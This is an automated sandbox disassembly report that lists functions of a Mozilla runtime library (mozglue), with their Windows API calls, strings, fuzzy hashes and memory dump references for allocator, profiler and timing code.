String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 7f858c21f78e6d78d2027aca5b594c932b7d362454c69eaf2f7fb16f2f3e1222
Instruction ID: 0452436c1bab496cb3e9e5be64e36e97f904d980624b2a9e382c792f9be1676a
Opcode Fuzzy Hash: 7f858c21f78e6d78d2027aca5b594c932b7d362454c69eaf2f7fb16f2f3e1222
Instruction Fuzzy Hash: F161C071900326ABDF00DF2AF896B5A7FA7EBCA350F004529EA1597290D730E854CF91

Function 665D3AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665E768,?,00003000,00000004), ref: 665D3AC5
LeaveCriticalSection.KERNEL32(6665E768,?,00003000,00000004), ref: 665D3AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 665D3AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 665D3B57
EnterCriticalSection.KERNEL32(6665E784), ref: 665D3B81
LeaveCriticalSection.KERNEL32(6665E784), ref: 665D3BA3
EnterCriticalSection.KERNEL32(6665E7B8), ref: 665D3BAE
LeaveCriticalSection.KERNEL32(6665E7B8), ref: 665D3C74
EnterCriticalSection.KERNEL32(6665E784), ref: 665D3C8B
LeaveCriticalSection.KERNEL32(6665E784), ref: 665D3C9F
LeaveCriticalSection.KERNEL32(6665E7B8), ref: 665D3D5C
EnterCriticalSection.KERNEL32(6665E784), ref: 665D3D67
LeaveCriticalSection.KERNEL32(6665E784), ref: 665D3D8A

Part of subcall function 66610D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,665D3DEF), ref: 66610D71
Part of subcall function 66610D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,665D3DEF), ref: 66610D84

Strings

MOZ_CRASH(), xrefs: 665D3DB2
: (malloc) Error in VirtualFree(), xrefs: 665D3DCC
<jemalloc>, xrefs: 665D3DC7

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: be7ac1b82979541d0d66feeaa8a0665490ab7f6b8a0ac6818ef190f70387676d
Instruction ID: a156ac2246676a1e1ee8f37f3e0e19543cfa394e9f53cebb57937e782723774e
Opcode Fuzzy Hash: be7ac1b82979541d0d66feeaa8a0665490ab7f6b8a0ac6818ef190f70387676d
Instruction Fuzzy Hash: AF91CF71A002548BDF04CF6DE8D272A7BB3BF96350B154568EA119B2C6D770EC10CF99

Function 665E11B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 665E1213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 665E1285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 665E12B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 665E1327

Strings

TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 665E12AD
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 665E131B
MZx, xrefs: 665E11E1
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 665E120D
&, xrefs: 665E126B

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: 171c7aa5b2fb7be8922656fc3e5bc1ff7b75926378cb2cc3d4015057e573fee1
Instruction ID: 3614a78d37f1688f6da3ccffc9e7cfd6f7f1616af25e61d8bd68139c107b16e8
Opcode Fuzzy Hash: 171c7aa5b2fb7be8922656fc3e5bc1ff7b75926378cb2cc3d4015057e573fee1
Instruction Fuzzy Hash: C471A071E007688ADF21DF64DC02BDEBBF2BF99349F04065AD545A3340DB346A88CB96

Function 665D31C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 665D3217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 665D3236
FreeLibrary.KERNEL32 ref: 665D324B
__Init_thread_footer.LIBCMT ref: 665D3260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 665D327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 665D328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 665D32AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 665D32D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 665D32E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 665D32F7

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

__aulldiv.LIBCMT ref: 665D346B

Strings

QueryInterruptTime, xrefs: 665D3230
KernelBase.dll, xrefs: 665D3212

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 856ebb3860af2aa3a5f99731deae03ef55fff9a930ea1bfe33d5e03994ba7490
Instruction ID: 50871d3d7d50c28b296183477cff5eb87e5ed386a5e287e7c3a247e033bc77cc
Opcode Fuzzy Hash: 856ebb3860af2aa3a5f99731deae03ef55fff9a930ea1bfe33d5e03994ba7490
Instruction Fuzzy Hash: C76156719087418BC711CF39D85261BBBE6FFC6390F118B2DF9A5A3290EB319945CB82

Function 66636660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6665F618), ref: 66636694
GetThreadId.KERNEL32(?), ref: 666366B1
GetCurrentThreadId.KERNEL32 ref: 666366B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 666366E1
EnterCriticalSection.KERNEL32(6665F618), ref: 66636734
GetCurrentProcess.KERNEL32 ref: 6663673A
LeaveCriticalSection.KERNEL32(6665F618), ref: 6663676C
GetCurrentThread.KERNEL32 ref: 666367FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 66636868
RtlCaptureContext.NTDLL ref: 6663687F

Strings

WalkStack64, xrefs: 66636890

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: e6daec92fb71078fbd9653f0f1819edf769865c57a66e24ad0b1fe4c9d5e56af
Instruction ID: 24cc93cd848f52a75324984982a4d1743a441e314e3f4edb66010ec04ecf2549
Opcode Fuzzy Hash: e6daec92fb71078fbd9653f0f1819edf769865c57a66e24ad0b1fe4c9d5e56af
Instruction Fuzzy Hash: FC51AD71908361AFDB11CF26E845B5BBBF6BF89710F04482DF699A7240D7B0E914CB92

Function 6661DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661DE73
GetCurrentThreadId.KERNEL32 ref: 6661DF7D
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661DF8A
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661DFC9
GetCurrentThreadId.KERNEL32 ref: 6661DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,665E4A68), ref: 6661DE7B

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,665E4A68), ref: 6661DEB8
free.MOZGLUE(00000000,?,665E4A68), ref: 6661DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6661DF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6661DE83
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6661E00E
<none>, xrefs: 6661DFD7

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 08ccbc3f2eaa03f70d663a71dd5a675780f0d818e6ff5f6a70263069c3a03ba6
Instruction ID: 14ebc0fcd23b110663cd8612df0c3bf6790f6e57099cb52866d6c257d546a542
Opcode Fuzzy Hash: 08ccbc3f2eaa03f70d663a71dd5a675780f0d818e6ff5f6a70263069c3a03ba6
Instruction Fuzzy Hash: 37410231A046209FDB10DF6AFD0676ABF67EBC2309F040129EA1597342DB709901CBE2

Function 6662D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6662D85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D918
GetCurrentThreadId.KERNEL32 ref: 6662D93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D970
GetCurrentThreadId.KERNEL32 ref: 6662D976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6662DA2E
GetCurrentThreadId.KERNEL32 ref: 6662DA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662DA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6662DA91

Part of subcall function 665F5C50: GetTickCount64.KERNEL32 ref: 665F5D40
Part of subcall function 665F5C50: EnterCriticalSection.KERNEL32(6665F688), ref: 665F5D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662DAB7

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: f46e5e6ef181c3291687aa13c7fb493dd5b257fdaee3761e76b43420605ed3a4
Instruction ID: 34a2b59e1b90fda8f8003ffda557f3dbdd8e580843e9bd1c9f653591674db9fb
Opcode Fuzzy Hash: f46e5e6ef181c3291687aa13c7fb493dd5b257fdaee3761e76b43420605ed3a4
Instruction Fuzzy Hash: F771BD31A043149FCB00CF29D898B6ABBF6FFC9354F15856AE95A9B301DB30A944CF91

Function 6662D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6662D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D52A
GetCurrentThreadId.KERNEL32 ref: 6662D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D55F
free.MOZGLUE(00000000), ref: 6662D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6662D5D3
GetCurrentThreadId.KERNEL32 ref: 6662D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D652
GetCurrentThreadId.KERNEL32 ref: 6662D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D6A2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 5d48df7db57606efdbc0a47943cf1ab8139a3162f0376e26ebc8ab7688bffcf7
Instruction ID: 257f91a5c0b41cd5cdc75f385126760e3cd1264212bc5958f079bfb320540eb2
Opcode Fuzzy Hash: 5d48df7db57606efdbc0a47943cf1ab8139a3162f0376e26ebc8ab7688bffcf7
Instruction Fuzzy Hash: 4C516D71904705DFC704DF35D884A9ABBFAFF89358F00862EE95A97310DB70A945CB91

Function 665D1E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665E784), ref: 665D1EC1
LeaveCriticalSection.KERNEL32(6665E784), ref: 665D1EE1
EnterCriticalSection.KERNEL32(6665E744), ref: 665D1F38
LeaveCriticalSection.KERNEL32(6665E744), ref: 665D1F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 665D1F83
LeaveCriticalSection.KERNEL32(6665E784), ref: 665D1FC0
EnterCriticalSection.KERNEL32(6665E784), ref: 665D1FE2
LeaveCriticalSection.KERNEL32(6665E784), ref: 665D1FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 665D2019

Strings

MOZ_CRASH(), xrefs: 665D2000
Def, xrefs: 665D1F32
\ef, xrefs: 665D1F3E
Def, xrefs: 665D1F56

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: Def$Def$MOZ_CRASH()$\ef
API String ID: 2055633661-4254612906
Opcode ID: 5d4bc40be214b40b1c5da647fe63e1289f802182c57c13aa04c455572aa8afb4
Instruction ID: 08a35b2cab6e3ede42d1a0a4ca25489c98bf590c7561dce6ec4952c456b418cf
Opcode Fuzzy Hash: 5d4bc40be214b40b1c5da647fe63e1289f802182c57c13aa04c455572aa8afb4
Instruction Fuzzy Hash: 6E41D671E043668BDF11CF6DEC96B6A3BA7EF99344F050025EA0597381DB71A800CBA9

Function 665F5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 665F56D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 665F56E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 665F56F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 665F5744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 665F57BC
GetTickCount64.KERNEL32 ref: 665F58CB
EnterCriticalSection.KERNEL32(6665F688), ref: 665F58F3
__aulldiv.LIBCMT ref: 665F5945
LeaveCriticalSection.KERNEL32(6665F688), ref: 665F59B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6665F638,?,?,?,?), ref: 665F59E9

Strings

MOZ_APP_RESTART, xrefs: 665F56CC

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: f48fb1fed8274d8378586a74f9f06d7872e0d11ca3eb4ee0bce2ff7cdf0499f2
Instruction ID: c7979fc86977032c119516451a93706f608e3059d2376ee1edc549939be0fe9e
Opcode Fuzzy Hash: f48fb1fed8274d8378586a74f9f06d7872e0d11ca3eb4ee0bce2ff7cdf0499f2
Instruction Fuzzy Hash: 3AC19E719187509FDB09CF29D44266ABBF2BFDA354F05CA1DE9C497260D730A886CF82

Function 6661EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661EC8C

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

GetCurrentThreadId.KERNEL32 ref: 6661ECA1
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6661ECC5
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6661ED19
CloseHandle.KERNEL32(?), ref: 6661ED28
free.MOZGLUE(00000000), ref: 6661ED2F
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6661EC94

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: ae62753481171e3879d0835d3610a7af64e42b73f530edf27f2a3dd0eb2372e7
Instruction ID: 2b9f60eb32d24196c9acea08ab0b15ec1d2e030a91b51480d8aec8bee07e4e95
Opcode Fuzzy Hash: ae62753481171e3879d0835d3610a7af64e42b73f530edf27f2a3dd0eb2372e7
Instruction Fuzzy Hash: A821A375804164ABDF01DF69FC06A6ABF6BEBC636DF144211FE1897241DB31D811CBA1

Function 665E3A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 665E3BB4
ReleaseSRWLockShared.KERNEL32 ref: 665E3BD2
AcquireSRWLockExclusive.KERNEL32 ref: 665E3BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 665E3C91
ReleaseSRWLockShared.KERNEL32 ref: 665E3CBD
moz_xmalloc.MOZGLUE ref: 665E3CF1

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: aa795689ca9f2a9924b5b9457a7766dd43ab0fa7e965cc9b193f980aff62477e
Instruction ID: 0cac5880433cb825224b047dd39a9d8a1a0591ac89085688011ae76ab223d407
Opcode Fuzzy Hash: aa795689ca9f2a9924b5b9457a7766dd43ab0fa7e965cc9b193f980aff62477e
Instruction Fuzzy Hash: 55C16EB1904741CFCB14DF29C18565ABBF6BF99304F158A9ED8998B321D731E885CF82

Function 66618ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 665DEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 665DEB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6661B392,?,?,00000001), ref: 666191F4

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

Strings

data, xrefs: 666190E8
stack-chart, xrefs: 666190B2
timeline-ipc, xrefs: 66619096
timeline-overview, xrefs: 6661907A
timeline-fileio, xrefs: 666190A4
name, xrefs: 66618F16
marker-chart, xrefs: 6661905E
marker-table, xrefs: 6661906C
timeline-memory, xrefs: 66619088

